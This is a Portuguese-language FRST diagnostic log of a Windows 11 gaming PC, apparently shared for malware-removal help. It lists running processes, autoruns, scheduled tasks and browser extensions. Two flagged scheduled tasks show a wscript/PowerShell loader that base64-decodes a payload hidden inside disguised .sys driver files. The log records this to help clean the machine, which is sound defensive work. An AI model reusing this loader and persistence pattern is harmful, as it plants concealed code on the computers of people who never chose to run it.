Resultado do análise da Farbar Recovery Scan Tool (FRST) (x64) Versão: 15-08-2022
Executado por trean (administrador) em DESKTOP-PB33GKO (ASUS System Product Name) (21-08-2022 19:30:39)
Executando a partir de C:\Users\trean\Desktop
Perfis Carregados: trean
Plataforma: Microsoft Windows 11 Enterprise Versão 21H2 22000.856 (X64) Idioma: Português (Brasil)
Navegador padrão: Chrome
Modo da Inicialização: Normal

==================== Processos (Whitelisted) =================

(Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.)

(C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe ->) (Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\bdagent.exe
(C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe ->) (Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\bdntwrk.exe
(C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe ->) (Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\bdwtxag.exe
(C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe ->) (Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\seccenter.exe
(C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe ->) (S.C. BITDEFENDER S.R.L. -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\wsccommunicator.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\Users\trean\Desktop\adwcleaner.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_11.2206.17.0_x64__8wekyb3d8bbwe\Notepad\Notepad.exe
(explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe <25>
(explorer.exe ->) (Malwarebytes Inc -> Malwarebytes) C:\Users\trean\Desktop\adwcleaner.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(services.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTek COMPUTER INC.) C:\Program Files (x86)\ASUS\ROG Live Service\ROGLiveService.exe
(services.exe ->) (ASUSTEK COMPUTER INCORPORATION -> ASUS Inc.) C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender Agent\redline\bdredline.exe
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\bdservicehost.exe <3>
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:\Program Files\Bitdefender\Bitdefender Security\updatesrv.exe
(services.exe ->) (Bitdefender SRL -> Bitdefender) C:\Program Files\Common Files\Bitdefender\SetupInformation\Bitdefender RedLine\bdredline.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Windows\System32\WirelessKB850NotificationService.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.67.21001.0_x64__8wekyb3d8bbwe\gamingservices.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.67.21001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_47917a79b8c7fd22\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_31a20374e0a7b123\RtkAudUService64.exe
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
(svchost.exe ->) (ASUSTeK Computer Inc. -> ) C:\Program Files\ASUS\KINGSTON_Aac_DRAM\AacKingstonDramHal_x64.exe
(svchost.exe ->) (ASUSTeK Computer Inc. -> ) C:\Program Files\ASUS\KINGSTON_Aac_DRAM\AacKingstonDramHal_x86.exe
(svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUS) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\AcPowerNotification\AcPowerNotification.exe
(svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTek Compputer Inc.) C:\Program Files\ASUS\AacMB\Aac3572MbHal_x86.exe
(svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTeK Computer Inc.) C:\Program Files\ASUS\AacExtCard\extensionCardHal_x86.exe
(svchost.exe ->) (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Program Files\ASUS\ASUS_Aac_DRAM\Aac3572DramHal_x86.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20970.0_x64__8wekyb3d8bbwe\HxOutlook.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20970.0_x64__8wekyb3d8bbwe\HxTsr.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
Falha ao acessar processo -> NoiseCancelingEngine.exe

==================== Registro (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.)

HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_31a20374e0a7b123\RtkAudUService64.exe [1333640 2021-08-18] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [129288 2022-03-05] (Adobe Inc. -> )
HKLM\...\RunOnce: [msedge_cleanup_{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}] => C:\Program Files (x86)\Microsoft\EdgeWebView\Application\104.0.1293.63\Installer\setup.exe [3286968 2022-08-21] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-535022414-3499471442-1354494860-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4234600 2022-08-19] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-535022414-3499471442-1354494860-1001\...\Run: [Discord] => C:\Users\trean\AppData\Local\Discord\Update.exe [1512104 2021-05-24] (Discord Inc. -> GitHub)
HKU\S-1-5-21-535022414-3499471442-1354494860-1001\...\Run: [elevenClock] => C:\Users\trean\AppData\Local\Programs\ElevenClock\ElevenClock.exe [52058432 2022-08-03] (Martí Climent) [Arquivo não assinado]
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\104.0.5112.101\Installer\chrmstp.exe [2022-08-20] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] -> 

==================== Tarefas Agendadas (Whitelisted) ============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

Task: {134C7CD1-5413-4108-96BB-C5C071CC300C} - System32\Tasks\ASUS\ASUSUpdateTaskMachineCore1d85d4024040c30 => C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [153112 2022-05-01] (ASUSTeK COMPUTER INC. -> ASUSTeK Computer Inc.)
Task: {1BA8DD3C-645D-4C2C-B7F7-ABCD49951279} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [646344 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {1BB2CD52-4E46-4B11-BA09-2FDAD216F401} - System32\Tasks\ASUS\ASUSUpdateTaskMachineUA => C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [153112 2022-05-01] (ASUSTeK COMPUTER INC. -> ASUSTeK Computer Inc.)
Task: {2558F0B9-FA04-4221-9F96-B936AA64A49D} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342080 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {2D03160C-90C1-4A25-8AD7-02BF5A53BF5D} - System32\Tasks\Intel\Intel Telemetry 2 => C:\Program Files\Intel\Telemetry 2.0\lrio.exe [2064744 2021-01-19] (Intel(R) Production Software -> Intel Corporation)
Task: {2D63D07F-62EE-46F6-A597-0E8F6593622C} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {4CEE609C-B125-471B-ABAC-8A743C35D283} - System32\Tasks\BlueStacksHelper_nxt => C:\Program Files\BlueStacks_nxt\BlueStacksHelper.exe [275136 2022-05-25] (Bluestack Systems, Inc -> BlueStack Systems, Inc.)
Task: {6205F746-5A8C-4D93-9246-08A4BFC4F782} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {66441D3C-3510-4F66-9696-33602EBC27B1} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender Security\bdagent.exe [987200 2022-08-08] (Bitdefender SRL -> Bitdefender)
Task: {70834A29-EE7D-49C0-AB5A-2F303F75B15D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154456 2021-06-28] (Google LLC -> Google LLC)
Task: {7313D8A9-5F81-4C91-BE46-BFA43A4CA4CB} - System32\Tasks\Microsoft\Windows\Management\Autopilot\RemediateHardwareChange => {62B2DD2C-F129-42EE-BF59-55D3FD21C215} C:\WINDOWS\System32\Autopilot.dll [217088 2022-07-23] (Microsoft Windows -> Microsoft Corporation)
Task: {7405A0CA-DB39-4274-9820-7C30DD35B012} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\26.0.1.231\WatchDog.exe [1053264 2022-07-25] (Bitdefender SRL -> Bitdefender)
Task: {7463AC3F-1D28-4D81-A84F-241AEB102D09} - System32\Tasks\Microsoft\Windows\Management\Provisioning\uVHdYU7n\EE40F928-0675-4114-816D-14F46AB3B1C0 => wscript.exe /e:vbscript /b "C:\Windows\System32\IHHuVHdY\FFC21546-537D-45EB-8886-5A8ACF753A6F" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\7nLYzGp\896C46C2-9270-4FF5-B1BC-3188EE7E1A45.sys'), 2072030, 422); $sc2 = [Convert]::FromBase64String($sc); (a entrada de dados tem 98 mais caracteres). <==== ATENÇÃO
Task: {7926FA19-0404-43E1-8439-C9A313BD81F8} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-03-01] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {7D2D30ED-7A88-444D-9EAC-830BC678A29E} - System32\Tasks\Microsoft\Windows\Management\Autopilot\DetectHardwareChange => {62B2DD2C-F129-42EE-BF59-55D3FD21C215} C:\WINDOWS\System32\Autopilot.dll [217088 2022-07-23] (Microsoft Windows -> Microsoft Corporation)
Task: {7D5278FE-9F1E-4CF4-85D4-ECED9847692F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154456 2021-06-28] (Google LLC -> Google LLC)
Task: {82C6ECB5-BC7D-4DD6-915D-268B9AF1519C} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {8A12120A-7836-4073-B21F-0E691DB43033} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
Task: {91A4F9AC-EE88-4A2C-B837-F80CFB018F2F} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {A8057FC0-3352-475C-BD73-DE2CE1ADA56C} - System32\Tasks\MicrosoftEdgeShadowStackRollbackTask => C:\Program Files (x86)\Microsoft\Edge\Application\104.0.1293.63\Installer\setup.exe [3286968 2022-08-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {B0D98F3A-34E9-4B4A-88A1-6F830A6B56FE} - System32\Tasks\ASUS\P508PowerAgent_sdk => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ShareFromArmouryIII\Mouse\ROG STRIX CARRY\P508PowerAgent.exe (Nenhum Arquivo)
Task: {C3CB31F0-5636-4EBE-9CCF-1DA1EA89F2DA} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2113024 2022-06-14] () [Arquivo não assinado]
Task: {C82E73A1-1A07-4C8C-98E8-B933EFA0EB97} - System32\Tasks\ASUS\ArmourySocketServer => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmourySocketServer.exe [2157024 2022-03-11] (ASUSTeK COMPUTER INC. -> ASUS)
Task: {C87A4BB2-BB98-481B-97CF-B5BA834662DB} - System32\Tasks\Microsoft\Windows\Management\Provisioning\Qh9i2O\0384CD6B-37FD-4229-A779-268B7B8CE12A => wscript.exe /e:vbscript /b "C:\Windows\System32\wwNQh9i2Ou\C6C803FC-B84C-4497-A1E3-B94560BD3752" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\OwucnC\E3821943-2D12-4B62-BF27-27564D0A771B.sys'), 2018793, 422); $sc2 = [Convert]::FromBase64String($sc); (a entrada de dados tem 99 mais caracteres). <==== ATENÇÃO
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => C:\WINDOWS\System32\MbaeParserTask.exe (Nenhum Arquivo)
Task: {D0323CE4-57AC-4F76-9EA9-7799718738AC} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {D1525516-349F-4372-927A-2F4EC27A0B0F} - System32\Tasks\ASUS\NoiseCancelingEngine => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\MBLedSDK\NoiseCancelingEngine.exe [1241960 2021-11-24] (ASUSTeK Computer Inc. -> ASUS)
Task: {D9513DC9-479B-42DD-9994-41E6D5E45467} - System32\Tasks\ASUS\AcPowerNotification => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\AcPowerNotification\AcPowerNotification.exe [293856 2022-03-11] (ASUSTeK COMPUTER INC. -> ASUS)
Task: {F35E4299-3108-477A-9DE6-0C43E1208B3B} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)

(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe

==================== Internet (Whitelisted) ====================

(Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.)

Tcpip\Parameters: [DhcpNameServer] 181.213.132.2 181.213.132.3
Tcpip\..\Interfaces\{03852173-405c-4568-ba4a-f3fda8fe169c}: [NameServer] 1.1.1.1,1.0.0.1
Tcpip\..\Interfaces\{03852173-405c-4568-ba4a-f3fda8fe169c}: [DhcpNameServer] 181.213.132.2 181.213.132.3
Tcpip\..\Interfaces\{1ae533b0-6428-46cc-b081-6f5cc44a995e}: [NameServer] 8.8.8.8,8.8.8.4
Tcpip\..\Interfaces\{1ae533b0-6428-46cc-b081-6f5cc44a995e}: [DhcpNameServer] 181.213.132.2 181.213.132.3

Edge: 
=======
Edge Extension: (Sem Nome) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [não encontrado (a)]
Edge Extension: (Sem Nome) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [não encontrado (a)]
Edge Extension: (Sem Nome) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [não encontrado (a)]
Edge Extension: (Sem Nome) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [não encontrado (a)]
Edge DefaultProfile: Default
Edge Profile: C:\Users\trean\AppData\Local\Microsoft\Edge\User Data\Default [2022-08-21]
Edge Session Restore: Default -> está habilitado.
Edge Extension: (Halo The Series – Prophets) - C:\Users\trean\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\eggjaaiapifnlgehbjgbbophakkbhkpm [2022-04-23]
Edge Extension: (uBlock Origin) - C:\Users\trean\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\odfafepnkmbhccpbejgmiehpchacaeak [2022-07-14]
Edge HKLM-x32\...\Edge\Extension: [pdhdldaneekjpoaldekpgomomeabpnek]

FireFox:
========
FF DefaultProfile: 2cpndhoe.default
FF ProfilePath: C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test [2022-08-21]
FF Homepage: Mozilla\Firefox\Profiles\va3ikc0r.test -> hxxps://www.google.com/
FF Session Restore: Mozilla\Firefox\Profiles\va3ikc0r.test -> está habilitado.
FF Extension: (Disconnect) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\2.0@disconnect.me.xpi [2022-01-13]
FF Extension: (Enhancer for YouTube™) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\enhancerforyoutube@maximerf.addons.mozilla.org.xpi [2022-01-13]
FF Extension: (Tampermonkey) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\firefox@tampermonkey.net.xpi [2022-01-13]
FF Extension: (HTTPS Everywhere) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\https-everywhere@eff.org.xpi [2022-01-13]
FF Extension: (Alternate Player for Twitch.tv) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\twitch5@coolcmd.xpi [2022-01-13]
FF Extension: (uBlock Origin) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\uBlock0@raymondhill.net.xpi [2022-01-13]
FF Extension: (View image) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\{287dcf75-bec6-4eec-b4f6-71948a2eea29}.xpi [2022-01-13]
FF Extension: (YouTube Screenshot) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\{d8b32864-153d-47fb-93ea-c273c4d1ef17}.xpi [2022-01-13]
FF Extension: (DownThemAll!) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}.xpi [2022-01-13]
FF Extension: (Instagram Photo Plus) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\va3ikc0r.test\Extensions\{feb6c5e7-41e5-4da1-a08f-5e3b73055be2}.xpi [2022-01-13]
FF ProfilePath: C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\2cpndhoe.default [2022-08-21]
FF ProfilePath: C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release [2022-08-21]
FF NetworkProxy: Mozilla\Firefox\Profiles\cya1mh2p.default-release -> type", 0
FF Session Restore: Mozilla\Firefox\Profiles\cya1mh2p.default-release -> está habilitado.
FF Extension: (Disconnect) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\2.0@disconnect.me.xpi [2021-06-28]
FF Extension: (English United States Dictionary) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\@unitedstatesenglishdictionary.xpi [2022-01-14]
FF Extension: (Dark Reader) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\addon@darkreader.org.xpi [2022-08-17]
FF Extension: (Enhancer for YouTube™) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\enhancerforyoutube@maximerf.addons.mozilla.org.xpi [2022-06-21]
FF Extension: (Tampermonkey) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\firefox@tampermonkey.net.xpi [2022-05-11]
FF Extension: (HTTPS Everywhere) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\https-everywhere@eff.org.xpi [2021-07-15]
FF Extension: (Magic Actions for YouTube™) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\jid0-UVAeBCfd34Kk5usS8A1CBiobvM8@jetpack.xpi [2021-06-28]
FF Extension: (English (US) Language Pack) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\langpack-en-US@firefox.mozilla.org.xpi [2022-08-09]
FF Extension: (Google Translator for Firefox) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\translator@zoli.bod.xpi [2022-07-27]
FF Extension: (Alternate Player for Twitch.tv) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\twitch5@coolcmd.xpi [2022-02-09]
FF Extension: (uBlock Origin) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\uBlock0@raymondhill.net.xpi [2022-08-18]
FF Extension: (View image) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\{287dcf75-bec6-4eec-b4f6-71948a2eea29}.xpi [2022-06-15]
FF Extension: (Voltar Dislikes do YouTube) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\{762f9885-5a13-4abd-9c77-433dcd38b8fd}.xpi [2022-08-06]
FF Extension: (YouTube Screenshot) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\{d8b32864-153d-47fb-93ea-c273c4d1ef17}.xpi [2021-06-28]
FF Extension: (DownThemAll!) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}.xpi [2022-08-04]
FF Extension: (Instagram Photo Plus) - C:\Users\trean\AppData\Roaming\Mozilla\Firefox\Profiles\cya1mh2p.default-release\Extensions\{feb6c5e7-41e5-4da1-a08f-5e3b73055be2}.xpi [2022-06-15]
FF HKLM\...\Firefox\Extensions: [bdwtwe@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdwteff.xpi
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender Security\bdwteff.xpi [2021-08-04] [UpdateUrl:hxxps://download.bitdefender.com/windows/desktop/connect/wallet/updates.json ]
FF HKLM\...\Firefox\Extensions: [bdtbe@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdtbef.xpi
FF Extension: (Antitracker da Bitdefender) - C:\Program Files\Bitdefender\Bitdefender Security\bdtbef.xpi [2020-09-17] [UpdateUrl:hxxps://download.bitdefender.com/windows/desktop/connect/antitracker/updates.json ]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender Security\bdtbext [2021-08-08] [] [não assinado]
FF HKLM-x32\...\Firefox\Extensions: [bdwtwe@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdwteff.xpi
FF HKLM-x32\...\Firefox\Extensions: [bdtbe@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdtbef.xpi
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdtbext
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\autoconf_warsaw.js [2022-02-23]
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\bd_js_config.js [2021-07-01] <==== ATENÇÃO (Aponta para arquivo *.cfg)
FF ExtraCheck: C:\Program Files\mozilla firefox\bd_config.cfg [2021-07-01] <==== ATENÇÃO

Chrome: 
=======
CHR Profile: C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default [2022-08-21]
CHR Notifications: Default -> hxxps://tetr.io
CHR HomePage: Default -> hxxps://www.google.com.br/
CHR StartupUrls: Default -> "hxxp://www.google.com.br/"
CHR Session Restore: Default -> está habilitado.
CHR Extension: (Alternate Player for Twitch.tv) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhplkbgoehhhddaoolmakpocnenplmhf [2022-04-06]
CHR Extension: (MEGA) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\bigefpfhnfcobdlfbedofhhaibnlghod [2022-08-20]
CHR Extension: (Chamada pelo Skype) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\blakpkgjpemejpbmfiglncklihnhjkij [2021-06-28]
CHR Extension: (uBlock Origin development build) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgbcahbpdhpcegmbfconppldiemgcoii [2022-08-20]
CHR Extension: (Slate) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhmcmgkegfffbbfobhjpdbimgmoohap [2021-09-07]
CHR Extension: (IG Downloader) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\cpgaheeihidjmolbakklolchdplenjai [2022-08-20]
CHR Extension: (AHA Music - Song Finder para Browser) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\dpacanjfikmhoddligfbehkpomnbgblf [2022-08-08]
CHR Extension: (Voltar Dislikes do YouTube) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\gebbhagfogifgggkldgodflihgfeippi [2022-08-09]
CHR Extension: (Documentos Google off-line) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-07-26]
CHR Extension: (Screenshot YouTube) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjoijpfmdhbjkkgnmahganhoinjjpohk [2021-12-20]
CHR Extension: (View Image Button) - C:\Users\trean\AppData\Local\Google\Chrome\User Data\Default\Extensions\gllpomlmiljchdbigeahkpflkonfjiob [2022-06-05]
